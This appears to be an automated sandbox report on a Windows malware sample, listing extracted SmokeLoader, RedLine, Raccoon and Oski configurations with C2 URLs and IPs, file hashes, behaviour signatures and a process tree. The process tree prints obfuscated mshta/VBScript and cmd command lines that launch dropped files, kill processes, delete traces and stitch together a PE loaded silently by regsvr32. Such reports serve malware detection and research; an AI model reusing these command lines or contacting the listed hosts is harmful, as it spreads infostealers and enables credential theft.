Analysis
-
max time kernel
158s -
max time network
154s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
13-11-2021 19:21
Static task
static1
Behavioral task
behavioral1
Sample
afdebbe310efbf8ebc01012495dba839.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
afdebbe310efbf8ebc01012495dba839.exe
Resource
win10-en-20211104
General
-
Target
afdebbe310efbf8ebc01012495dba839.exe
-
Size
317KB
-
MD5
afdebbe310efbf8ebc01012495dba839
-
SHA1
4107fbed949f1c820da21072f94ead291052e572
-
SHA256
d5c05cd26342688768185f72a797e379fccea0ced4b49af77770a632f0601166
-
SHA512
dab287c424767bdaa4f5fb936062b20b80e2d8889e8236d6607fa700bb0fd777fa159126d1ec97fcdc6b22c4ce51e50a00b401b0c301896d06941237cd8f62c1
Malware Config
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
redline
185.159.80.90:38637
Extracted
redline
SuperStar
185.215.113.29:36224
Extracted
raccoon
1.8.3-hotfix
675718a5f2ce6d3cacf6cb04a512f5637eae995f
-
url4cnc
http://91.219.236.27/agrybirdsgamerept
http://5.181.156.92/agrybirdsgamerept
http://91.219.236.207/agrybirdsgamerept
http://185.225.19.18/agrybirdsgamerept
http://91.219.237.227/agrybirdsgamerept
http://185.163.47.176/agrybirdsgamerept
Extracted
oski
takpo.biz
Signatures
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/432-145-0x0000000000418EEA-mapping.dmp family_redline behavioral2/memory/432-144-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/888-166-0x0000000002370000-0x000000000238C000-memory.dmp family_redline behavioral2/memory/888-168-0x00000000024C0000-0x00000000024DB000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 2120 created 1440 2120 WerFault.exe 6707.exe -
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
Processes:
3BEC.exe4081.exe438F.exe4B50.exe4081.exe3BEC.exe4B50.exe6707.exeGrindstone.exeGrindstone.exeGrindstone.exeD4F5.exeSIOFYL_.eXEpid process 2252 3BEC.exe 3688 4081.exe 1804 438F.exe 2664 4B50.exe 432 4081.exe 3192 3BEC.exe 888 4B50.exe 1440 6707.exe 2316 Grindstone.exe 3160 Grindstone.exe 3092 Grindstone.exe 3908 D4F5.exe 3876 SIOFYL_.eXE -
Deletes itself 1 IoCs
Processes:
pid process 3028 -
Loads dropped DLL 3 IoCs
Processes:
Grindstone.exepid process 3092 Grindstone.exe 3092 Grindstone.exe 3092 Grindstone.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 5 IoCs
Processes:
afdebbe310efbf8ebc01012495dba839.exe4081.exe3BEC.exe4B50.exeGrindstone.exedescription pid process target process PID 1424 set thread context of 588 1424 afdebbe310efbf8ebc01012495dba839.exe afdebbe310efbf8ebc01012495dba839.exe PID 3688 set thread context of 432 3688 4081.exe 4081.exe PID 2252 set thread context of 3192 2252 3BEC.exe 3BEC.exe PID 2664 set thread context of 888 2664 4B50.exe 4B50.exe PID 2316 set thread context of 3092 2316 Grindstone.exe Grindstone.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2120 1440 WerFault.exe 6707.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
afdebbe310efbf8ebc01012495dba839.exe438F.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI afdebbe310efbf8ebc01012495dba839.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI afdebbe310efbf8ebc01012495dba839.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI afdebbe310efbf8ebc01012495dba839.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 438F.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 438F.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 438F.exe -
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Grindstone.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Grindstone.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 2392 taskkill.exe 4012 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
description ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
afdebbe310efbf8ebc01012495dba839.exepid process 588 afdebbe310efbf8ebc01012495dba839.exe 588 afdebbe310efbf8ebc01012495dba839.exe 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3028 -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
afdebbe310efbf8ebc01012495dba839.exe438F.exepid process 588 afdebbe310efbf8ebc01012495dba839.exe 1804 438F.exe 3028 3028 3028 3028 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WerFault.exe4081.exetaskkill.exetaskkill.exedescription pid process Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeRestorePrivilege 2120 WerFault.exe Token: SeBackupPrivilege 2120 WerFault.exe Token: SeDebugPrivilege 2120 WerFault.exe Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeDebugPrivilege 432 4081.exe Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeDebugPrivilege 2392 taskkill.exe Token: SeDebugPrivilege 4012 taskkill.exe Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
afdebbe310efbf8ebc01012495dba839.exe4081.exe3BEC.exe4B50.exe4081.exeGrindstone.exeD4F5.exedescription pid process target process PID 1424 wrote to memory of 588 1424 afdebbe310efbf8ebc01012495dba839.exe afdebbe310efbf8ebc01012495dba839.exe PID 1424 wrote to memory of 588 1424 afdebbe310efbf8ebc01012495dba839.exe afdebbe310efbf8ebc01012495dba839.exe PID 1424 wrote to memory of 588 1424 afdebbe310efbf8ebc01012495dba839.exe afdebbe310efbf8ebc01012495dba839.exe PID 1424 wrote to memory of 588 1424 afdebbe310efbf8ebc01012495dba839.exe afdebbe310efbf8ebc01012495dba839.exe PID 1424 wrote to memory of 588 1424 afdebbe310efbf8ebc01012495dba839.exe afdebbe310efbf8ebc01012495dba839.exe PID 1424 wrote to memory of 588 1424 afdebbe310efbf8ebc01012495dba839.exe afdebbe310efbf8ebc01012495dba839.exe PID 3028 wrote to memory of 2252 3028 3BEC.exe PID 3028 wrote to memory of 2252 3028 3BEC.exe PID 3028 wrote to memory of 2252 3028 3BEC.exe PID 3028 wrote to memory of 3688 3028 4081.exe PID 3028 wrote to memory of 3688 3028 4081.exe PID 3028 wrote to memory of 3688 3028 4081.exe PID 3028 wrote to memory of 1804 3028 438F.exe PID 3028 wrote to memory of 1804 3028 438F.exe PID 3028 wrote to memory of 1804 3028 438F.exe PID 3688 wrote to memory of 432 3688 4081.exe 4081.exe PID 3688 wrote to memory of 432 3688 4081.exe 4081.exe PID 3688 wrote to memory of 432 3688 4081.exe 4081.exe PID 3028 wrote to memory of 2664 3028 4B50.exe PID 3028 wrote to memory of 2664 3028 4B50.exe PID 3028 wrote to memory of 2664 3028 4B50.exe PID 3688 wrote to memory of 432 3688 4081.exe 4081.exe PID 3688 wrote to memory of 432 3688 4081.exe 4081.exe PID 3688 wrote to memory of 432 3688 4081.exe 4081.exe PID 3688 wrote to memory of 432 3688 4081.exe 4081.exe PID 3688 wrote to memory of 432 3688 4081.exe 4081.exe PID 2252 wrote to memory of 3192 2252 3BEC.exe 3BEC.exe PID 2252 wrote to memory of 3192 2252 3BEC.exe 3BEC.exe PID 2252 wrote to memory of 3192 2252 3BEC.exe 3BEC.exe PID 2252 wrote to memory of 3192 2252 3BEC.exe 3BEC.exe PID 2252 wrote to memory of 3192 2252 3BEC.exe 3BEC.exe PID 2252 wrote to memory of 3192 2252 3BEC.exe 3BEC.exe PID 2664 wrote to memory of 888 2664 4B50.exe 4B50.exe PID 2664 wrote to memory of 888 2664 4B50.exe 4B50.exe PID 2664 wrote to memory of 888 2664 4B50.exe 4B50.exe PID 2664 wrote to memory of 888 2664 4B50.exe 4B50.exe PID 2664 wrote to memory of 888 2664 4B50.exe 4B50.exe PID 2664 wrote to memory of 888 2664 4B50.exe 4B50.exe PID 2664 wrote to memory of 888 2664 4B50.exe 4B50.exe PID 2664 wrote to memory of 888 2664 4B50.exe 4B50.exe PID 2664 wrote to memory of 888 2664 4B50.exe 4B50.exe PID 3028 wrote to memory of 1440 3028 6707.exe PID 3028 wrote to memory of 1440 3028 6707.exe PID 3028 wrote to memory of 1440 3028 6707.exe PID 432 wrote to memory of 2316 432 4081.exe Grindstone.exe PID 432 wrote to memory of 2316 432 4081.exe Grindstone.exe PID 432 wrote to memory of 2316 432 4081.exe Grindstone.exe PID 2316 wrote to memory of 3160 2316 Grindstone.exe Grindstone.exe PID 2316 wrote to memory of 3160 2316 Grindstone.exe Grindstone.exe PID 2316 wrote to memory of 3160 2316 Grindstone.exe Grindstone.exe PID 2316 wrote to memory of 3092 2316 Grindstone.exe Grindstone.exe PID 2316 wrote to memory of 3092 2316 Grindstone.exe Grindstone.exe PID 2316 wrote to memory of 3092 2316 Grindstone.exe Grindstone.exe PID 2316 wrote to memory of 3092 2316 Grindstone.exe Grindstone.exe PID 2316 wrote to memory of 3092 2316 Grindstone.exe Grindstone.exe PID 2316 wrote to memory of 3092 2316 Grindstone.exe Grindstone.exe PID 2316 wrote to memory of 3092 2316 Grindstone.exe Grindstone.exe PID 2316 wrote to memory of 3092 2316 Grindstone.exe Grindstone.exe PID 2316 wrote to memory of 3092 2316 Grindstone.exe Grindstone.exe PID 3028 wrote to memory of 3908 3028 D4F5.exe PID 3028 wrote to memory of 3908 3028 D4F5.exe PID 3028 wrote to memory of 3908 3028 D4F5.exe PID 3908 wrote to memory of 1676 3908 D4F5.exe mshta.exe PID 3908 wrote to memory of 1676 3908 D4F5.exe mshta.exe -
outlook_office_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\afdebbe310efbf8ebc01012495dba839.exe"C:\Users\Admin\AppData\Local\Temp\afdebbe310efbf8ebc01012495dba839.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\afdebbe310efbf8ebc01012495dba839.exe"C:\Users\Admin\AppData\Local\Temp\afdebbe310efbf8ebc01012495dba839.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\3BEC.exeC:\Users\Admin\AppData\Local\Temp\3BEC.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3BEC.exeC:\Users\Admin\AppData\Local\Temp\3BEC.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4081.exeC:\Users\Admin\AppData\Local\Temp\4081.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4081.exeC:\Users\Admin\AppData\Local\Temp\4081.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Grindstone.exe"C:\Users\Admin\AppData\Local\Temp\Grindstone.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Grindstone.exeC:\Users\Admin\AppData\Local\Temp\Grindstone.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Grindstone.exeC:\Users\Admin\AppData\Local\Temp\Grindstone.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 3092 & erase C:\Users\Admin\AppData\Local\Temp\Grindstone.exe & RD /S /Q C:\\ProgramData\\421991453715149\\* & exit5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 30926⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\438F.exeC:\Users\Admin\AppData\Local\Temp\438F.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\4B50.exeC:\Users\Admin\AppData\Local\Temp\4B50.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4B50.exeC:\Users\Admin\AppData\Local\Temp\4B50.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6707.exeC:\Users\Admin\AppData\Local\Temp\6707.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 8682⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\D4F5.exeC:\Users\Admin\AppData\Local\Temp\D4F5.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPt: cLoSE ( CreaTEObJect("WSCrIpt.ShElL" ).Run ( "CMd.EXe /Q/c COPY /Y ""C:\Users\Admin\AppData\Local\Temp\D4F5.exe"" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF """"== """" for %S IN ( ""C:\Users\Admin\AppData\Local\Temp\D4F5.exe"" ) do taskkill -f /iM ""%~NXS"" " , 0 , TrUE ))2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q/c COPY /Y "C:\Users\Admin\AppData\Local\Temp\D4F5.exe" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF ""== "" for %S IN ("C:\Users\Admin\AppData\Local\Temp\D4F5.exe" ) do taskkill -f /iM "%~NXS"3⤵
-
C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPt: cLoSE ( CreaTEObJect("WSCrIpt.ShElL" ).Run ( "CMd.EXe /Q/c COPY /Y ""C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE"" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF ""/PqgNvw4IlDLT7hpq3_wecIlKVwsIMk ""== """" for %S IN ( ""C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE"" ) do taskkill -f /iM ""%~NXS"" " , 0 , TrUE ))5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q/c COPY /Y "C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF "/PqgNvw4IlDLT7hpq3_wecIlKVwsIMk "== "" for %S IN ("C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE" ) do taskkill -f /iM "%~NXS"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscrIPT: cLOSE(cREateObJeCt( "wscRiPt.SHELl"). Run ("cMd /r Echo | set /P = ""MZ"" > V_DXQ.No & COPY /y /b V_dXQ.NO +WX0Cjy.A + BPROiU.ZB +oWfJ6VGN.C+ Yg_AN9.GRP ..\CXSXSHYX.ZBV & STARt regsvr32 ..\CxSXSHYX.ZBV -s & dEL /q * " ,0 ,tRuE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r Echo | set /P = "MZ" > V_DXQ.No & COPY /y /b V_dXQ.NO +WX0Cjy.A + BPROiU.ZB +oWfJ6VGN.C+ Yg_AN9.GRP ..\CXSXSHYX.ZBV & STARt regsvr32 ..\CxSXSHYX.ZBV -s & dEL /q *6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>V_DXQ.No"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "7⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 ..\CxSXSHYX.ZBV -s7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /iM "D4F5.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4081.exe.logMD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA15271bc29538f11e42a3b600c8dc727186e912456
SHA256df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
C:\Users\Admin\AppData\Local\Temp\3BEC.exeMD5
2d4410f782307ab67ca3b6066e3d4f6a
SHA1fe709823cf9479cf93511a96d43b1d600b99493e
SHA25694563a2bb64b9bf3e490739a1214abeb30f23a24ebf4230b1feb13a26b83e6ca
SHA5121789fee92cad1d1a95467dcb08f87d556d66a2aeb17d95da1a2ae228751544418c140c139ba809920e5cc5e975b7011b4ce30e9adc2597d44035da7765c0f0d2
-
C:\Users\Admin\AppData\Local\Temp\3BEC.exeMD5
2d4410f782307ab67ca3b6066e3d4f6a
SHA1fe709823cf9479cf93511a96d43b1d600b99493e
SHA25694563a2bb64b9bf3e490739a1214abeb30f23a24ebf4230b1feb13a26b83e6ca
SHA5121789fee92cad1d1a95467dcb08f87d556d66a2aeb17d95da1a2ae228751544418c140c139ba809920e5cc5e975b7011b4ce30e9adc2597d44035da7765c0f0d2
-
C:\Users\Admin\AppData\Local\Temp\3BEC.exeMD5
2d4410f782307ab67ca3b6066e3d4f6a
SHA1fe709823cf9479cf93511a96d43b1d600b99493e
SHA25694563a2bb64b9bf3e490739a1214abeb30f23a24ebf4230b1feb13a26b83e6ca
SHA5121789fee92cad1d1a95467dcb08f87d556d66a2aeb17d95da1a2ae228751544418c140c139ba809920e5cc5e975b7011b4ce30e9adc2597d44035da7765c0f0d2
-
C:\Users\Admin\AppData\Local\Temp\4081.exeMD5
e922d31d9e42823f27cb8512b3afe7ac
SHA1c3acff8045e6ab4668894f9b0a42c274a654b2d8
SHA25618e784c6c045e8bc45a1a2c06d6013ef712cfd63f9b5843e31911fdf1a27a872
SHA512e9420bf7113c8be1addb736bfd8051327325256e5f03f83d6851b1f25883df39fe62bfa75b9f7ebab2002aedf1bc281f9f3cbdd44b7b7194adeb4e2789f73ac8
-
C:\Users\Admin\AppData\Local\Temp\4081.exeMD5
e922d31d9e42823f27cb8512b3afe7ac
SHA1c3acff8045e6ab4668894f9b0a42c274a654b2d8
SHA25618e784c6c045e8bc45a1a2c06d6013ef712cfd63f9b5843e31911fdf1a27a872
SHA512e9420bf7113c8be1addb736bfd8051327325256e5f03f83d6851b1f25883df39fe62bfa75b9f7ebab2002aedf1bc281f9f3cbdd44b7b7194adeb4e2789f73ac8
-
C:\Users\Admin\AppData\Local\Temp\4081.exeMD5
e922d31d9e42823f27cb8512b3afe7ac
SHA1c3acff8045e6ab4668894f9b0a42c274a654b2d8
SHA25618e784c6c045e8bc45a1a2c06d6013ef712cfd63f9b5843e31911fdf1a27a872
SHA512e9420bf7113c8be1addb736bfd8051327325256e5f03f83d6851b1f25883df39fe62bfa75b9f7ebab2002aedf1bc281f9f3cbdd44b7b7194adeb4e2789f73ac8
-
C:\Users\Admin\AppData\Local\Temp\438F.exeMD5
d985b4cfdceecc3c0fe4f3e4fda4e416
SHA1f3c14a4d87569e54faaf0eac73ec1aafa2621dfa
SHA256a8b37d6b073ee045ae63473cb1a592c974e896b19e3db06d552f955901c06db7
SHA512560a056c076db6893f6407807d9a10d1078c148aa588d9de6ce1874eeac0a4feaf2102b656ba96316a32c89df97986f20cf77e55117e2c9bf97e52ef3381335c
-
C:\Users\Admin\AppData\Local\Temp\438F.exeMD5
d985b4cfdceecc3c0fe4f3e4fda4e416
SHA1f3c14a4d87569e54faaf0eac73ec1aafa2621dfa
SHA256a8b37d6b073ee045ae63473cb1a592c974e896b19e3db06d552f955901c06db7
SHA512560a056c076db6893f6407807d9a10d1078c148aa588d9de6ce1874eeac0a4feaf2102b656ba96316a32c89df97986f20cf77e55117e2c9bf97e52ef3381335c
-
C:\Users\Admin\AppData\Local\Temp\4B50.exeMD5
410152194464a8763cea1ea21a9a9fa8
SHA13caa9890777a02af28d2af1cb96f9dd7e03547f6
SHA256f5babf8077d42050247f770eaa799f80c13499d427323952029a0ea3142321c3
SHA512784bd8136f380fd40ca7614359c8ab1430adcc495561f7e38285c59d94af0e48d4a1984971c700475ce89015b63c1f6d065f4dc827ecc6323422701adad6247b
-
C:\Users\Admin\AppData\Local\Temp\4B50.exeMD5
410152194464a8763cea1ea21a9a9fa8
SHA13caa9890777a02af28d2af1cb96f9dd7e03547f6
SHA256f5babf8077d42050247f770eaa799f80c13499d427323952029a0ea3142321c3
SHA512784bd8136f380fd40ca7614359c8ab1430adcc495561f7e38285c59d94af0e48d4a1984971c700475ce89015b63c1f6d065f4dc827ecc6323422701adad6247b
-
C:\Users\Admin\AppData\Local\Temp\4B50.exeMD5
410152194464a8763cea1ea21a9a9fa8
SHA13caa9890777a02af28d2af1cb96f9dd7e03547f6
SHA256f5babf8077d42050247f770eaa799f80c13499d427323952029a0ea3142321c3
SHA512784bd8136f380fd40ca7614359c8ab1430adcc495561f7e38285c59d94af0e48d4a1984971c700475ce89015b63c1f6d065f4dc827ecc6323422701adad6247b
-
C:\Users\Admin\AppData\Local\Temp\6707.exeMD5
0f2a6f61a47538be61905d63752a94aa
SHA1b20645d2b6ed7249b40ce74ef7185ebb66e55032
SHA256d3f1428295f9ad3e09608c041783a5d9a3e246b05412dd7708ca5dacf45da322
SHA512125f20e9b369c4bb5407b8965d60b534b6d1cefc670299a101c2acf748083e6934cebb962b31b661797406bfbb94ed9a69e32cc2677754a537e9686601bd9c69
-
C:\Users\Admin\AppData\Local\Temp\6707.exeMD5
0f2a6f61a47538be61905d63752a94aa
SHA1b20645d2b6ed7249b40ce74ef7185ebb66e55032
SHA256d3f1428295f9ad3e09608c041783a5d9a3e246b05412dd7708ca5dacf45da322
SHA512125f20e9b369c4bb5407b8965d60b534b6d1cefc670299a101c2acf748083e6934cebb962b31b661797406bfbb94ed9a69e32cc2677754a537e9686601bd9c69
-
C:\Users\Admin\AppData\Local\Temp\D4F5.exeMD5
57861feb58cc7432fc9191f26beac607
SHA1e76e9ea41e4cf2f5869bbf696e216e688fb7b82b
SHA2561c48f756080c780600c8eb59f9d10bc5f22b0ce2245687c9f51d6c2455a07a4e
SHA5120ccfb8364049473e1c36825ad009570ce68ba689a2de9e4f02688a44b508fe9f075e83e6c8d2a7d2c8d62cbf99c7054b0cc226ab6637fe816764f708a05bcfeb
-
C:\Users\Admin\AppData\Local\Temp\D4F5.exeMD5
57861feb58cc7432fc9191f26beac607
SHA1e76e9ea41e4cf2f5869bbf696e216e688fb7b82b
SHA2561c48f756080c780600c8eb59f9d10bc5f22b0ce2245687c9f51d6c2455a07a4e
SHA5120ccfb8364049473e1c36825ad009570ce68ba689a2de9e4f02688a44b508fe9f075e83e6c8d2a7d2c8d62cbf99c7054b0cc226ab6637fe816764f708a05bcfeb
-
